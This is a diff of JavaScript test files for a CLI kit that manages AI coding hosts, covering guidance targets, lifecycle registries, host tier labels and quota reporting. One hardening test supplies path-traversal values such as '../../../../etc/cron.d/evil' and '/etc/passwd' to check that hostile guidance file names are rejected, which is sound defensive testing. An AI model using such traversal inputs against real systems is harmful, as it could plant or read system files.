+// ── F-17: guidanceTargets is derived from HOST_REGISTRY, not a closed literal
+// list. These four cases pin EXACTLY today's shape (name/label/file, in order)
+// for every host-enablement combination, so the registry-derived rewrite below
+// cannot silently change what ships. ────────────────────────────────────────
+
+test('F-17 pin: claude-only (neither codex nor opencode present)', () => {
+  const cwd = '/tmp/proj-pin-claude-only';
+  const missingCodex = path.join(os.tmpdir(), 'no-such-codex-pin');
+  const missingOpencode = path.join(os.tmpdir(), 'no-such-opencode-pin');
+  const targets = guidanceTargets({ cwd, codexRoot: missingCodex, opencodeRoot: missingOpencode });
+  assert.deepEqual(targets, [
+    { name: 'claude', label: 'CLAUDE.md', file: claudeMdPath() },
+    { name: 'agents', label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') },
+  ]);
+});
+
+test('F-17 pin: +codex (codex dir present, opencode absent)', () => {
+  const cwd = '/tmp/proj-pin-codex';
+  const codexRoot = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-pin-codex-'));
+  const missingOpencode = path.join(os.tmpdir(), 'no-such-opencode-pin-2');
+  const targets = guidanceTargets({ cwd, codexRoot, opencodeRoot: missingOpencode });
+  assert.deepEqual(targets, [
+    { name: 'claude', label: 'CLAUDE.md', file: claudeMdPath() },
+    { name: 'agents', label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') },
+    { name: 'agents-user', label: '~/.codex/AGENTS.md', file: path.join(codexRoot, 'AGENTS.md') },
+  ]);
+  fs.rmSync(codexRoot, { recursive: true, force: true });
+});
+
+test('F-17 pin: +opencode (opencode dir present, codex absent)', () => {
+  const cwd = '/tmp/proj-pin-opencode';
+  const missingCodex = path.join(os.tmpdir(), 'no-such-codex-pin-3');
+  const opencodeRoot = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-pin-opencode-'));
+  const targets = guidanceTargets({ cwd, codexRoot: missingCodex, opencodeRoot });
+  assert.deepEqual(targets, [
+    { name: 'claude', label: 'CLAUDE.md', file: claudeMdPath() },
+    { name: 'agents', label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') },
+    { name: 'agents-opencode', label: 'opencode AGENTS.md', file: path.join(opencodeRoot, 'AGENTS.md') },
+  ]);
+  fs.rmSync(opencodeRoot, { recursive: true, force: true });
+});
+
+test('F-17 pin: all hosts present (codex + opencode)', () => {
+  const cwd = '/tmp/proj-pin-all';
+  const codexRoot = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-pin-codex-all-'));
+  const opencodeRoot = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-pin-opencode-all-'));
+  const targets = guidanceTargets({ cwd, codexRoot, opencodeRoot });
+  assert.deepEqual(targets, [
+    { name: 'claude', label: 'CLAUDE.md', file: claudeMdPath() },
+    { name: 'agents', label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') },
+    { name: 'agents-user', label: '~/.codex/AGENTS.md', file: path.join(codexRoot, 'AGENTS.md') },
+    { name: 'agents-opencode', label: 'opencode AGENTS.md', file: path.join(opencodeRoot, 'AGENTS.md') },
+  ]);
+  fs.rmSync(codexRoot, { recursive: true, force: true });
+  fs.rmSync(opencodeRoot, { recursive: true, force: true });
+});
+
+// ── F-17: synthetic-host derivation — proves the loop is genuinely driven by
+// the `hosts` registry (default HOST_REGISTRY), not a hardcoded literal array.
+// A registry entry this module has no bespoke path/label mapping for still
+// joins the loop via the generic fallback, named after its own guidanceFile. ─
+
+test('F-17: a synthetic nativeGuidance host with a guidanceFile joins the loop', () => {
+  const cwd = '/tmp/proj-synthetic';
+  const syntheticHost = {
+    id: 'acme-cli',
+    label: 'Acme CLI',
+    capabilities: { nativeGuidance: true },
+    legacy: { guidanceFile: 'agents-acme' },
+  };
+  const hosts = [...HOST_REGISTRY, syntheticHost];
+  const targets = guidanceTargets({ cwd, hosts, codexRoot: '/no/such/codex', opencodeRoot: '/no/such/opencode' });
+  const acme = targets.find((t) => t.name === 'agents-acme');
+  assert.ok(acme, 'synthetic host contributes a target named after its guidanceFile');
+  assert.equal(acme.file, path.join(cwd, 'agents-acme.md'));
+  // Real hosts' output is unaffected by the addition.
+  assert.deepEqual(targets.map((t) => t.name), ['claude', 'agents', 'agents-acme']);
+});
+
+test('F-17: a non-id-shaped guidanceFile contributes NO target (path-traversal hardening)', () => {
+  const cwd = '/tmp/proj-hardened';
+  const hostile = (guidanceFile) => ({
+    id: 'evil-cli', label: 'Evil CLI',
+    capabilities: { nativeGuidance: true },
+    legacy: { guidanceFile },
+  });
+  for (const name of ['../../../../etc/cron.d/evil', '/etc/passwd', 'a/b', 'a\\b', 'UPPER', 'dot.dot', '']) {
+    const targets = guidanceTargets({
+      cwd, hosts: [...HOST_REGISTRY, hostile(name)],
+      codexRoot: '/no/such/codex', opencodeRoot: '/no/such/opencode',
+    });
+    // The hostile host is skipped entirely (no target at all — so no file
+    // path is ever derived from the hostile name); built-ins are untouched.
+    assert.deepEqual(targets.map((t) => t.name), ['claude', 'agents'], `skipped for ${JSON.stringify(name)}`);
+  }
+});
+
+test('F-17: a host WITHOUT nativeGuidance never contributes a target, even with a guidanceFile', () => {
+  const cwd = '/tmp/proj-no-native-guidance';
+  const syntheticHost = {
+    id: 'silent-cli',
+    label: 'Silent CLI',
+    capabilities: { nativeGuidance: false },
+    legacy: { guidanceFile: 'agents-silent' },
+  };
+  const targets = guidanceTargets({ cwd, hosts: [syntheticHost] });
+  assert.deepEqual(targets, []);
+});
+
+test('F-17: HOST_REGISTRY is the real default — passing it explicitly matches the implicit default', () => {
+  const explicit = guidanceTargets({ cwd: '/tmp/z', hosts: HOST_REGISTRY });
+  const implicit = guidanceTargets({ cwd: '/tmp/z' });
+  assert.deepEqual(explicit, implicit);
+});
+
 // ── retiredForTarget ─────────────────────────────────────────────────────────
 
 test('retiredForTarget returns rows NOT listing the target, with a false detector', async () => {
@@ -70,6 +186,43 @@ test('retiredForTarget returns rows NOT listing the target, with a false detecto
   // Retired rows carry a detector that never fires (forced strip, not upsert).
   for (const r of retiredUser) {
     assert.notEqual(r.detector?.type, 'flag', 'retired detector must not re-fire the original');
+  }
+});
+
+// ── F-17: retiredForTarget's optional `knownTargets` universe ───────────────
+
+test('retiredForTarget without knownTargets is unchanged (2-arg call sites keep todays behavior)', () => {
+  // status.mjs / nudge.mjs / opencode.mjs all call retiredForTarget with 2 args
+  // and are outside this refactor's edit boundary — the 3rd param must default
+  // to exactly today's unconditional-strip behavior, even for a row naming a
+  // target unknown to any host.
+  const rows = [
+    { slug: 'typo-target', guidanceFiles: ['not-a-real-target'], detector: { type: 'always' } },
+  ];
+  const retired = retiredForTarget(rows, 'claude');
+  assert.deepEqual(retired.map((r) => r.slug), ['typo-target']);
+});
+
+test('retiredForTarget with knownTargets leaves an unrecognized-target row untouched', () => {
+  const knownTargets = ['claude', 'agents', 'agents-user', 'agents-opencode'];
+  const rows = [
+    { slug: 'typo-target', guidanceFiles: ['not-a-real-target'], detector: { type: 'always' } },
+    { slug: 'moved-away', guidanceFiles: ['agents-opencode'], detector: { type: 'always' } },
+  ];
+  const retired = retiredForTarget(rows, 'claude', knownTargets);
+  // 'typo-target' names nothing in the known universe → left alone, not force-stripped.
+  // 'moved-away' names a REAL known target (just not claude) → still force-stripped,
+  // preserving the original re-scoping/migration behavior.
+  assert.deepEqual(retired.map((r) => r.slug), ['moved-away']);
+});
+
+test('reconcileGuidance-style knownTargets derived from guidanceTargets() matches the real universe', () => {
+  const derived = guidanceTargets({ cwd: '/tmp/z', codexRoot: home ? codexDir() : '/no/codex' }).map((t) => t.name);
+  // Whatever the real machine's derived universe is, a row naming something
+  // entirely outside it is never force-stripped once knownTargets is passed.
+  const rows = [{ slug: 'outsider', guidanceFiles: ['definitely-not-a-real-target-xyz'], detector: { type: 'always' } }];
+  for (const name of derived) {
+    assert.deepEqual(retiredForTarget(rows, name, derived), [], `outsider row must not be force-stripped for ${name}`);
   }
 });
 

--- a/tests/kit/host-cli-migration.test.mjs
+++ b/tests/kit/host-cli-migration.test.mjs
@@ -60,6 +60,24 @@ test('ak host status dispatches the existing read-only status semantics', () => 
     'host management retains the existing host/provider fact payload during migration');
 });
 
+// D-2/F-25/F-26: the tier text and asymmetry sub-notes are capability-derived
+// (src/lib/hosts.mjs's hostTierLabel/hostAsymmetryNote), not an
+// `h.id === 'opencode'` special case in x/host.mjs — this pins the actual
+// rendered CLI text so a regression back to a hardcoded id check would fail
+// here even though nothing depends on the exact strings elsewhere.
+test('ak host status renders capability-derived tier text and asymmetry notes for every built-in host', () => {
+  const sb = sandbox();
+  const result = ak(sb, 'host', 'status');
+  assert.equal(result.status, 0, output(result));
+  const text = result.stdout;
+  assert.match(text, /^ {2}claude {4}.*· drives sessions · can lead$/m);
+  assert.match(text, /^ {2}codex {5}.*· drives sessions · can lead$/m);
+  assert.match(text, /^ {4}expose Codex to Claude Code as mcp__codex__codex in this project$/m);
+  assert.match(text, /^ {2}opencode {2}.*· routing only · supervised · not AQE$/m);
+  assert.match(text, /^ {4}consent boundary — a run can block on a permission event \(never auto-approved\); no ruflo backend env flag$/m);
+  assert.doesNotMatch(text, /routing host/, 'old hardcoded tier text must be fully replaced');
+});
+
 test('ak host preserves pick option parsing without performing an interactive run', () => {
   const sb = sandbox();
   const result = ak(sb, 'host', 'pick', '--help');

--- a/tests/kit/hosts.test.mjs
+++ b/tests/kit/hosts.test.mjs
@@ -5,10 +5,15 @@ import os from 'node:os';
 import path from 'node:path';
 import { HOST_IDS, adapterFor, drivingHost } from '../../src/lib/hosts.mjs';
 import { hostAuthState } from '../../src/lib/providers.mjs';
+import { managedHostIds } from '../../src/lib/adapters/registries.mjs';
 
 // ── HOST_ADAPTERS descriptors ────────────────────────────────────────────────
-test('HOST_ADAPTERS defines the three hosts', () => {
-  assert.deepEqual(HOST_IDS, ['claude', 'codex', 'opencode']);
+// HOST_IDS is HOST_ADAPTERS' key order (hosts.mjs filters HOST_REGISTRY by
+// canDriveSession and preserves registry order) — this proves that mirror,
+// not the exact built-in set (adapter-registries.test.mjs pins the full
+// HOST_REGISTRY contents deep-equal; that's where the shipped-set literal lives).
+test('HOST_ADAPTERS keys mirror the registry-derived managed host ids, in order', () => {
+  assert.deepEqual(HOST_IDS, managedHostIds());
 });
 
 test('claude adapter targets CLAUDE.md/json and supports a statusline', () => {

--- a/tests/kit/hosts.test.mjs
+++ b/tests/kit/hosts.test.mjs
@@ -3,7 +3,7 @@ import assert from 'node:assert/strict';
 import fs from 'node:fs';
 import os from 'node:os';
 import path from 'node:path';
-import { HOST_IDS, adapterFor, drivingHost } from '../../src/lib/hosts.mjs';
+import { HOST_IDS, adapterFor, drivingHost, hostTierLabel, hostAsymmetryNote } from '../../src/lib/hosts.mjs';
 import { hostAuthState } from '../../src/lib/providers.mjs';
 import { managedHostIds } from '../../src/lib/adapters/registries.mjs';
 
@@ -103,4 +103,69 @@ test('hostAuthState reports none for an absent claude with no key', () => {
 test('hostAuthState returns unknown for an unrecognized host', () => {
   const a = hostAuthState('zz-not-a-registered-host', { env: {}, present: true });
   assert.equal(a.mode, 'unknown');
+});
+
+// ── hostTierLabel / hostAsymmetryNote (D-2, F-25/F-26) ───────────────────────
+// Pins for the three built-in hosts — the derivation must reproduce (or
+// deliberately improve on, per the case-by-case call below) what x/host.mjs's
+// status() prints today. Nothing in the suite pinned the OLD literal text
+// ('· routing host', '· routing host (ak run; never primary/AQE)') before
+// this change, so these values are the new baseline going forward.
+test('hostTierLabel: claude (canBePrimary) reads "drives sessions · can lead"', () => {
+  assert.equal(hostTierLabel('claude'), 'drives sessions · can lead');
+});
+
+test('hostTierLabel: codex (canBePrimary) reads "drives sessions · can lead"', () => {
+  assert.equal(hostTierLabel('codex'), 'drives sessions · can lead');
+});
+
+test('hostTierLabel: opencode (routing-only, built-in, no aqeProvider) reads "routing only · supervised · not AQE"', () => {
+  assert.equal(hostTierLabel('opencode'), 'routing only · supervised · not AQE');
+});
+
+test('hostTierLabel returns empty for an unknown host id', () => {
+  assert.equal(hostTierLabel('zz-not-a-registered-host'), '');
+});
+
+test('hostTierLabel: a synthetic canDriveSession-only host (no primary, no routing) reads "drives sessions"', () => {
+  const synthetic = {
+    id: 'synth-drive-only',
+    capabilities: { canDriveSession: true, canBePrimary: false, canRouteActivities: false },
+    legacy: {},
+  };
+  assert.equal(hostTierLabel(synthetic), 'drives sessions');
+});
+
+test('hostTierLabel: a synthetic non-built-in routing-only host reads "routing only · external adapter · not AQE"', () => {
+  const synthetic = {
+    id: 'synth-external',
+    capabilities: { canDriveSession: true, canBePrimary: false, canRouteActivities: true },
+    legacy: {},
+    trust: { changes: [] },
+  };
+  // Not in HOST_REGISTRY (the default `builtins`), so it derives as external —
+  // proving the tier follows capabilities + registry membership, not an id.
+  assert.equal(hostTierLabel(synthetic), 'routing only · external adapter · not AQE');
+});
+
+test('hostTierLabel: a host with no session-driving capability at all yields no tier', () => {
+  assert.equal(hostTierLabel({ id: 'nd', capabilities: { canDriveSession: false } }), '');
+});
+
+test('hostAsymmetryNote: claude has nothing asymmetric to state', () => {
+  assert.equal(hostAsymmetryNote('claude'), '');
+});
+
+test('hostAsymmetryNote: codex states the MCP bridge grant, read off its own trust manifest', () => {
+  assert.equal(
+    hostAsymmetryNote('codex'),
+    'expose Codex to Claude Code as mcp__codex__codex in this project',
+  );
+});
+
+test('hostAsymmetryNote: opencode states its consent boundary and the absent ruflo backend flag', () => {
+  assert.equal(
+    hostAsymmetryNote('opencode'),
+    'consent boundary — a run can block on a permission event (never auto-approved); no ruflo backend env flag',
+  );
 });

--- a/tests/kit/integration-config.test.mjs
+++ b/tests/kit/integration-config.test.mjs
@@ -7,6 +7,7 @@ import {
 } from '../../src/lib/adapters/config.mjs';
 import { migrateConfig } from '../../src/lib/adapters/migration.mjs';
 import { migrateKitConfig } from '../../src/lib/config.mjs';
+import { defaultHostMap } from '../../src/lib/adapters/index.mjs';
 
 const legacyDual = {
   providers: {
@@ -171,7 +172,11 @@ test('active legacy hosts win once over a stale additive integration snapshot', 
     providers: { hosts: { claude: false, codex: true, opencode: true } },
     integrations: {
       version: 1,
-      hosts: { claude: true, codex: false, opencode: false },
+      // The stale snapshot is deliberately the fresh-install defaults, contrasted with the
+      // active providers.hosts above (its exact inverse) — the point is precedence, not
+      // this literal shape, so derive it rather than hand-typing a value that would silently
+      // stop being "a plausible stale default" if the registry's defaults ever changed.
+      hosts: defaultHostMap(),
       bindings: [],
     },
   });

--- a/tests/kit/lifecycle-registry.test.mjs
+++ b/tests/kit/lifecycle-registry.test.mjs
@@ -1,0 +1,86 @@
+// The lifecycle registry — host lifecycle adapters (detect/plan/apply/verify/
+// undo) reached by id lookup, never by a named import of a concrete host
+// module. Only opencode has a lifecycle adapter today; this file pins that
+// the registry wires it correctly at import time AND that the five call
+// sites that used to `import { OPENCODE_LIFECYCLE_ADAPTER } from
+// '../lib/opencode.mjs'` no longer do — the whole point of F-02 is that a
+// second lifecycle host never needs a new named import anywhere.
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'node:fs';
+import path from 'node:path';
+import { fileURLToPath } from 'node:url';
+import {
+  registerBuiltinLifecycle, lifecycleAdapterFor, hostsWithLifecycle,
+} from '../../src/lib/adapters/lifecycle-registry.mjs';
+import { OPENCODE_LIFECYCLE_ADAPTER } from '../../src/lib/opencode.mjs';
+import { validateLifecycleAdapter } from '../../src/lib/adapters/lifecycle.mjs';
+import { HOST_REGISTRY } from '../../src/lib/adapters/index.mjs';
+import { fakeLifecycleAdapter, fakeSurface } from './helpers/lifecycle-harness.mjs';
+
+const ROOT = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '../..');
+const src = (rel) => fs.readFileSync(path.join(ROOT, 'src', rel), 'utf8');
+
+test('lifecycleAdapterFor(\'opencode\') returns the real, validated adapter', () => {
+  const adapter = lifecycleAdapterFor('opencode');
+  assert.equal(adapter, OPENCODE_LIFECYCLE_ADAPTER, 'registry must hand back the SAME adapter instance opencode.mjs exports');
+  assert.doesNotThrow(() => validateLifecycleAdapter(adapter));
+});
+
+test('lifecycleAdapterFor of an unknown/unregistered host id returns null', () => {
+  assert.equal(lifecycleAdapterFor('codex'), null, 'codex has no lifecycle adapter yet');
+  assert.equal(lifecycleAdapterFor('not-a-real-host'), null);
+});
+
+test('hostsWithLifecycle() returns only registered ids, in HOST_REGISTRY order', () => {
+  const ids = hostsWithLifecycle();
+  assert.deepEqual(ids, ['opencode'], 'only opencode is registered in this wave');
+  // order sanity: whatever is registered must appear in the same relative
+  // order it holds in HOST_REGISTRY, not Map-insertion order.
+  const registryOrder = HOST_REGISTRY.map((h) => h.id);
+  let cursor = -1;
+  for (const id of ids) {
+    const idx = registryOrder.indexOf(id);
+    assert.ok(idx > cursor, `${id} out of HOST_REGISTRY order`);
+    cursor = idx;
+  }
+});
+
+test('registering an unknown host id throws at registration (construction-time invariant)', () => {
+  const surface = fakeSurface({ enabled: false });
+  const adapter = fakeLifecycleAdapter(surface);
+  assert.throws(
+    () => registerBuiltinLifecycle('not-in-the-registry', adapter, { hostRegistry: [{ id: 'claude' }, { id: 'opencode' }] }),
+    /not-in-the-registry/,
+  );
+});
+
+test('registering an adapter that fails the lifecycle contract throws (construction-time invariant)', () => {
+  assert.throws(
+    () => registerBuiltinLifecycle('claude', { id: 'claude', detect() {} }, { hostRegistry: [{ id: 'claude' }] }),
+    /must be a function/,
+  );
+});
+
+test('registering a known host id with a valid adapter succeeds and is retrievable', () => {
+  const surface = fakeSurface({ enabled: false });
+  const adapter = fakeLifecycleAdapter(surface);
+  const registered = registerBuiltinLifecycle('claude', adapter, { hostRegistry: [{ id: 'claude' }] });
+  assert.equal(registered, adapter);
+});
+
+// ── architecture guard: dispatch by registry, never by name ────────────────
+// Real import errors (a wiring bug in a built-in) are supposed to throw at
+// module load — proven above via the hostRegistry-override seam rather than a
+// fresh-module import, since the real HOST_REGISTRY/opencode wiring is
+// correct and importing it a second time would just re-hit Node's ESM module
+// cache (no fresh throw to observe).
+for (const rel of [
+  'commands/sync.mjs', 'commands/setup.mjs', 'commands/x/host.mjs', 'commands/uninstall.mjs',
+]) {
+  test(`${rel} no longer names OPENCODE_LIFECYCLE_ADAPTER — it goes through the registry`, () => {
+    const text = src(rel);
+    assert.ok(!text.includes('OPENCODE_LIFECYCLE_ADAPTER'),
+      `${rel} must reach opencode's lifecycle adapter via lifecycleAdapterFor(...), not a named import`);
+  });
+}

--- a/tests/kit/lifecycle-registry.test.mjs
+++ b/tests/kit/lifecycle-registry.test.mjs
@@ -11,11 +11,14 @@ import fs from 'node:fs';
 import path from 'node:path';
 import { fileURLToPath } from 'node:url';
 import {
-  registerBuiltinLifecycle, lifecycleAdapterFor, hostsWithLifecycle,
+  registerBuiltinLifecycle, registerAdmittedLifecycle, lifecycleAdapterFor,
+  hostsWithLifecycle, builtinHostsWithLifecycle,
 } from '../../src/lib/adapters/lifecycle-registry.mjs';
 import { OPENCODE_LIFECYCLE_ADAPTER } from '../../src/lib/opencode.mjs';
 import { validateLifecycleAdapter } from '../../src/lib/adapters/lifecycle.mjs';
 import { HOST_REGISTRY } from '../../src/lib/adapters/index.mjs';
+import { validateAdapterManifest } from '../../src/lib/adapters/manifest.mjs';
+import { applyAdmitted, resetAdmitted } from '../../src/lib/adapters/admitted.mjs';
 import { fakeLifecycleAdapter, fakeSurface } from './helpers/lifecycle-harness.mjs';
 
 const ROOT = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '../..');
@@ -84,3 +87,75 @@ for (const rel of [
       `${rel} must reach opencode's lifecycle adapter via lifecycleAdapterFor(...), not a named import`);
   });
 }
+
+for (const rel of ['commands/sync.mjs', 'commands/setup.mjs', 'commands/uninstall.mjs']) {
+  test(`${rel} loops builtinHostsWithLifecycle(), not hostsWithLifecycle() (Wave 4 P1: armed opencode-shaped-loop crash)`, () => {
+    const text = src(rel);
+    assert.ok(text.includes('builtinHostsWithLifecycle'),
+      `${rel}'s lifecycle loop must use builtinHostsWithLifecycle() — its loop body destructures an opencode-shaped result and would crash on a non-opencode admitted host`);
+  });
+}
+
+// ── P1: the armed opencode-shaped-loop crash ────────────────────────────────
+// setup.mjs/sync.mjs/uninstall.mjs's lifecycle loops destructure an
+// opencode-shaped result (stack.oc / ret.undo / ret.artifacts). Today only
+// opencode is registered, so that's unreachable — but registerAdmittedLifecycle
+// exists precisely to admit a non-opencode-shaped host's lifecycle adapter,
+// and hostsWithLifecycle() (a pure effectiveHostRegistry() query) would then
+// include it too, handing that host straight into the shape-dependent loops.
+// builtinHostsWithLifecycle() must stay built-ins-only regardless.
+test('builtinHostsWithLifecycle() excludes an admitted external host even after its lifecycle is registered', () => {
+  const hostId = 'hermes-lifecycle-probe';
+  const host = {
+    id: hostId,
+    label: 'Hermes',
+    install: { bin: hostId, externalInstallPolicy: 'detect-never-overwrite' },
+    capabilities: {
+      canDriveSession: true, canBePrimary: false, canRouteActivities: true,
+      commandStatusline: false, transcripts: true, usage: false,
+      nativeMcpConfig: false, nativeGuidance: false,
+    },
+    trust: { approvalPolicy: 'unchanged', changes: [] },
+    enabledByDefault: false,
+    configProjection: 'ruflo',
+    observability: [],
+  };
+  const manifest = validateAdapterManifest({
+    name: hostId,
+    version: '1.0.0',
+    contract: 1,
+    host,
+    detection: { bin: hostId },
+    driving: { surfaces: ['acp'] },
+    lifecycle: { detect: { hook: { command: [hostId, 'detect'] } } },
+    trust: {
+      changes: [{
+        id: 'hermes-subprocess-hooks', kind: 'third-party-adapter', scope: 'project',
+        owner: 'hermes', value: 'subprocess hooks', effect: 'run consented lifecycle hooks for hermes',
+      }],
+    },
+  });
+
+  // Baseline BEFORE admitting anything — not a literal ['opencode'], because
+  // an earlier test in this same file (registerBuiltinLifecycle('claude', ...))
+  // mutates the real, process-shared LIFECYCLE_ADAPTERS map too. The
+  // invariant under test is "unaffected by registering an external", so
+  // compare against a live before/after snapshot instead of a hardcoded list.
+  const before = builtinHostsWithLifecycle();
+
+  applyAdmitted([{ entry: host }]);
+  try {
+    registerAdmittedLifecycle(manifest, { runHook: async () => ({ ok: true, stdout: '{}', exitCode: 0 }) });
+
+    assert.ok(hostsWithLifecycle().includes(hostId),
+      'sanity: the pure registry query DOES see the admitted, lifecycle-registered host');
+    assert.ok(
+      !builtinHostsWithLifecycle().includes(hostId),
+      'the setup/sync/uninstall-facing function must never include an admitted external, even once its lifecycle is registered',
+    );
+    assert.deepEqual(builtinHostsWithLifecycle(), before,
+      'builtinHostsWithLifecycle() must be unaffected by registering an external lifecycle adapter');
+  } finally {
+    resetAdmitted();
+  }
+});

--- a/tests/kit/provider-cli.test.mjs
+++ b/tests/kit/provider-cli.test.mjs
@@ -13,6 +13,7 @@ import fs from 'node:fs';
 import os from 'node:os';
 import path from 'node:path';
 import { DUAL_ROLE_TIP, JUDGE_BIAS_TIP } from '../../src/lib/providers.mjs';
+import { defaultHostMap } from '../../src/lib/adapters/index.mjs';
 
 // Tripwire (#137): a spawned `ak x host pick` whose cwd falls back to the test
 // process's cwd writes PROJECT-scoped config (.claude/settings.local.json,
@@ -239,7 +240,7 @@ test('pick --host claude,opencode enables + wires opencode (config, plugin, agen
       'enablement-gated guidance converges on enable — "wired + guided" is one contract');
 
     const cfg = kitJson(sb.home);
-    assert.deepEqual(cfg.integrations.hosts, { claude: true, codex: false, opencode: true });
+    assert.deepEqual(cfg.integrations.hosts, { ...defaultHostMap(), opencode: true });
     assert.equal(cfg.integrations.ownership.opencode.mcp, 'ak', 'ownership marker persisted');
     assert.ok(cfg.integrations.ownership.opencode.managed?.mcp?.['claude-flow']?.written, 'value-precise ownership recorded');
   } finally {
@@ -276,7 +277,7 @@ test('pick --host claude on an opencode-enabled machine disables it: ak wiring s
       'ak plugin removed');
 
     const cfg = kitJson(sb.home);
-    assert.deepEqual(cfg.integrations.hosts, { claude: true, codex: false, opencode: false });
+    assert.deepEqual(cfg.integrations.hosts, defaultHostMap());
     assert.equal(cfg.integrations.ownership.opencode.mcp, null, 'ownership markers nulled on disable');
     assert.equal(cfg.integrations.ownership.opencode.managed, null);
   } finally {

--- a/tests/kit/providers.test.mjs
+++ b/tests/kit/providers.test.mjs
@@ -13,7 +13,7 @@ import {
   PROVIDER_TOKEN_RE, seedActivityRoutesIfMultiHost,
 } from '../../src/lib/providers.mjs';
 import * as paths from '../../src/lib/paths.mjs';
-import { managedHostIds, routableHostIds } from '../../src/lib/adapters/index.mjs';
+import { managedHostIds, routableHostIds, HOST_REGISTRY } from '../../src/lib/adapters/index.mjs';
 
 // security review Finding 2 / code-quality Finding 2: applyProviders() feeds
 // m.id/m.model into a ruflo subprocess argv. exec.mjs's shell:false fix is
@@ -220,8 +220,15 @@ test('every host descriptor carries an npm package name for install/update', () 
 });
 
 test('managed and routable host sets come only from registry capabilities', () => {
-  assert.deepEqual(managedHostIds(), ['claude', 'codex', 'opencode']);
-  assert.deepEqual(routableHostIds(), ['claude', 'codex', 'opencode']);
+  // Derive expectations straight from HOST_REGISTRY.capabilities (not a hand-typed
+  // id list) so the assertion actually proves the claim in the test name; the
+  // shipped built-in set itself is pinned deep-equal in adapter-registries.test.mjs.
+  const expectedManaged = HOST_REGISTRY.filter((h) => h.capabilities.canDriveSession).map((h) => h.id);
+  const expectedRoutable = HOST_REGISTRY.filter((h) => h.capabilities.canRouteActivities).map((h) => h.id);
+  assert.deepEqual(managedHostIds(), expectedManaged);
+  assert.deepEqual(routableHostIds(), expectedRoutable);
+  // HOSTS (providers.mjs) filters HOST_REGISTRY independently of managedHostIds() —
+  // pin that the two derivations agree.
   assert.deepEqual(HOSTS.map((h) => h.id), managedHostIds());
 });
 

--- a/tests/kit/quota.test.mjs
+++ b/tests/kit/quota.test.mjs
@@ -9,7 +9,7 @@ import path from 'node:path';
 import { EventEmitter } from 'node:events';
 import {
   windowLabel, normalizeClaudeLimits, normalizeCodexLimits, readClaudeLimits,
-  collectCodexLimits, CODEX_TTL_MS,
+  collectCodexLimits, CODEX_TTL_MS, unsupportedQuotaHosts, readLimits,
 } from '../../src/lib/quota.mjs';
 
 const tmp = () => fs.mkdtempSync(path.join(os.tmpdir(), 'ak-quota-'));
@@ -191,4 +191,60 @@ test('collectCodexLimits falls back to the STALE cache when the spawn fails', as
 test('collectCodexLimits returns null when there has never been an answer', async () => {
   const out = await collectCodexLimits({ cacheFile: path.join(tmp(), 'none.json'), spawnImpl: failSpawn });
   assert.equal(out, null);
+});
+
+// ── unsupportedQuotaHosts — F-10: label absence instead of leaving it silent ─
+//
+// ADR-0010 sanctions exactly two channels (claude's statusline tee, codex's
+// app-server). This does not add a third — it never probes anything — it only
+// says so, for any OTHER registry-managed host the caller reports enabled.
+
+test('unsupportedQuotaHosts labels an enabled managed host with no channel', () => {
+  const out = unsupportedQuotaHosts({ enabledHosts: { opencode: true } });
+  assert.deepEqual(out, [
+    { provider: 'opencode', supported: false, reason: 'no quota surface for this host' },
+  ]);
+});
+
+test('unsupportedQuotaHosts omits a host the caller has not enabled', () => {
+  assert.deepEqual(unsupportedQuotaHosts(), []);
+  assert.deepEqual(unsupportedQuotaHosts({ enabledHosts: {} }), []);
+  assert.deepEqual(unsupportedQuotaHosts({ enabledHosts: { opencode: false } }), []);
+});
+
+test('unsupportedQuotaHosts never labels the two sanctioned channels', () => {
+  const out = unsupportedQuotaHosts({ enabledHosts: { claude: true, codex: true, opencode: true } });
+  assert.deepEqual(out.map((h) => h.provider), ['opencode']);
+});
+
+// ── readLimits — the combined /api/limits payload ───────────────────────────
+
+test('readLimits: claude/codex outputs are byte-identical whether or not others are reported', async () => {
+  const dir = tmp();
+  const claudeFile = path.join(dir, 'claude-rate-limits.json');
+  fs.writeFileSync(claudeFile, JSON.stringify(CLAUDE_TEE));
+  const codexCacheFile = path.join(dir, 'codex-rate-limits.json');
+
+  const withoutOthers = await readLimits({
+    now: 1000, claudeFile, codexCacheFile, spawnImpl: fakeSpawn(CODEX_RESP),
+  });
+  const withOthers = await readLimits({
+    now: 1000, claudeFile, codexCacheFile: path.join(dir, 'codex-rate-limits-2.json'),
+    spawnImpl: fakeSpawn(CODEX_RESP), enabledHosts: { claude: true, codex: true, opencode: true },
+  });
+
+  assert.deepEqual(withOthers.claude, withoutOthers.claude);
+  assert.deepEqual(withOthers.codex, withoutOthers.codex);
+  assert.deepEqual(withoutOthers.others, []);
+  assert.deepEqual(withOthers.others, [
+    { provider: 'opencode', supported: false, reason: 'no quota surface for this host' },
+  ]);
+});
+
+test('readLimits defaults to no unsupported-host labels when enabledHosts is not passed', async () => {
+  const out = await readLimits({
+    now: 1000, claudeFile: path.join(tmp(), 'absent.json'),
+    codexCacheFile: path.join(tmp(), 'codex.json'), spawnImpl: failSpawn,
+  });
+  assert.deepEqual(out.others, []);
 });

--- a/tests/kit/routing-config.test.mjs
+++ b/tests/kit/routing-config.test.mjs
@@ -10,6 +10,7 @@ import {
   routingIntent,
 } from '../../src/lib/routing-config.mjs';
 import { loadKitConfig, saveKitConfig } from '../../src/lib/config.mjs';
+import { defaultHostMap } from '../../src/lib/adapters/index.mjs';
 
 test('legacy routes migrate without resolving absence and preserve an explicit empty ladder', () => {
   const legacy = {
@@ -159,8 +160,7 @@ test('load migrates raw legacy presence without writing; save persists only cano
   const before = fs.readFileSync(file, 'utf8');
   const loaded = loadKitConfig(file);
   assert.equal(fs.readFileSync(file, 'utf8'), before, 'load is read-only');
-  assert.deepEqual(loaded.integrations.hosts,
-    { claude: true, codex: true, opencode: false });
+  assert.deepEqual(loaded.integrations.hosts, { ...defaultHostMap(), codex: true });
   assert.equal(loaded.routing.primaryHost, 'codex');
   assert.deepEqual(loaded.routing.routes.implementation.escalation, []);
   assert.equal(loaded.providers.aqeProvider, 'openai');

